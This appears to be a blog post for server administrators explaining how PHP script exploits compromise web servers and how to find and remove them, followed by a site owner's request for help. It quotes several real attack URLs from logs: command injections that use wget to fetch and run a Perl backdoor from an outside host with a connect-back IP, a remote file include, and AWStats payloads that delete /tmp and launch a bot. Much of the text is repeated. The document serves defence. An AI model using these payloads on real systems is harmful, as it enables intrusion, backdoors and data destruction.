php script exploits - hacking The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. Many times its well known in the community which scripts are vulnerable and they get fixed. For example at one time PHPBB was vulnerable and any versions older then xx could be exploited. Following that it was AWstats and the list goes on.
What the hackers do is pass the script some variables and commands in an http URL. The vulnerability is that the script allows the commands to be run.
Here are a few examples:
/misc.php?do=page&template={${system("cd%20/tmp;wget%20http://shop.rjp.ca/images/canalshell/bd/dc;%20chmod%20777%20dc.pl%20;%20perl%20dc.pl;%20dc .pl%20201.8.188.152%204222")}}
//include/print_category.php?setup%5Buse_category%5D=1/include/print_category.php?setup%5Buse_category%5D=1&dir=h ttp://www.bh-net.dk/cmd2.gif?&cmd=uname%20-a%20;%20id HTTP/1.1
You can see the hacker puts in the URL a few commands and the paths to other scripts they want to upload which then allow them to upload more scripts and run more commands etc...
All of this happens under the user that apache (httpd) is running under which is usually the user nobody. Most of the time in the way this happens the hacker ends up with access only to the /tmp directory. Hence most of the hackers files and scripts are found in the /tmp directory.
The next thing the hacker does is usually upload and IRC bot so they can chat and show off they have hacked the server. Then they usually upload scanning tools or ddos'ing (flooding) tools and start to either scan other servers to attempt to hack or they start a ddos attack against another server.
The good news is they dont have root access so once you remove all their files and stop all their processes (you can just reboot for this) they are gone. However if you dont find and fix the vulnerable script they will come right back.
So how do you find the script? Well thats the hard part. Sometimes there is a community wide problem as mentioned above with PHPBB and AWstats so you know exactly what you need to update/upgrade. However, many times these may be custom scripts or one-off scripts that may have a vulnerability. If you are not a programmer and dont have time to go through every php script on your server the next best bet is to go through all your httpd logs and look for a similar looking URL to the ones posted above - Keep in mind the name of the script will probably not be the same but the formation of the URL will be similar and not like the other things in the httpd logs. This can be time consuming and tedious unfortunately, but its really the only way.
Once you find the script you can either fix it by reprogamming it, or updating it with a fixed version, or you can delete it. You can also install mod_security into Apache which will block most all php/command attempts. If you have a cpanel server its available for free as an add-on.
What the hackers do is pass the script some variables and commands in an http URL. The vulnerability is that the script allows the commands to be run.
Here are a few examples:
/misc.php?do=page&template={${system("cd%20/tmp;wget%20http://shop.rjp.ca/images/canalshell/bd/dc;%20chmod%20777%20dc.pl%20;%20perl%20dc.pl;%20dc .pl%20201.8.188.152%204222")}}
//include/print_category.php?setup%5Buse_category%5D=1/include/print_category.php?setup%5Buse_category%5D=1&dir=h ttp://www.bh-net.dk/cmd2.gif?&cmd=uname%20-a%20;%20id HTTP/1.1
You can see the hacker puts in the URL a few commands and the paths to other scripts they want to upload which then allow them to upload more scripts and run more commands etc...
All of this happens under the user that apache (httpd) is running under which is usually the user nobody. Most of the time in the way this happens the hacker ends up with access only to the /tmp directory. Hence most of the hackers files and scripts are found in the /tmp directory.
The next thing the hacker does is usually upload and IRC bot so they can chat and show off they have hacked the server. Then they usually upload scanning tools or ddos'ing (flooding) tools and start to either scan other servers to attempt to hack or they start a ddos attack against another server.
The good news is they dont have root access so once you remove all their files and stop all their processes (you can just reboot for this) they are gone. However if you dont find and fix the vulnerable script they will come right back.
So how do you find the script? Well thats the hard part. Sometimes there is a community wide problem as mentioned above with PHPBB and AWstats so you know exactly what you need to update/upgrade. However, many times these may be custom scripts or one-off scripts that may have a vulnerability. If you are not a programmer and dont have time to go through every php script on your server the next best bet is to go through all your httpd logs and look for a similar looking URL to the ones posted above - Keep in mind the name of the script will probably not be the same but the formation of the URL will be similar and not like the other things in the httpd logs. This can be time consuming and tedious unfortunately, but its really the only way.
Once you find the script you can either fix it by reprogamming it, or updating it with a fixed version, or you can delete it. You can also install mod_security into Apache which will block most all php/command attempts. If you have a cpanel server its available for free as an add-on.
here is the latest attempts going around to get in via awstats
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.members.lycos.co.uk/adisef/newbot;perl%20netsky;echo%20;rm%20-rf%20netsky*;echo| HTTP/1.1
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.members.lycos.co.uk/adisef/newbot;perl%20netsky;echo%20;rm%20-rf%20netsky*;echo| HTTP/1.1
hacker attemp to inject script My site has been hacked recently by injecting the following script . This script starts downloading malware,badware as soon as the page is resolved in the browser . Hosting guys say they cannt do any thing about it and requested upgrade script .
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .
Some body may please let me know the solutions.
I need some solutions to protect my site from such malicious attack.
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .
Some body may please let me know the solutions.
I need some solutions to protect my site from such malicious attack.
No comments:
Post a Comment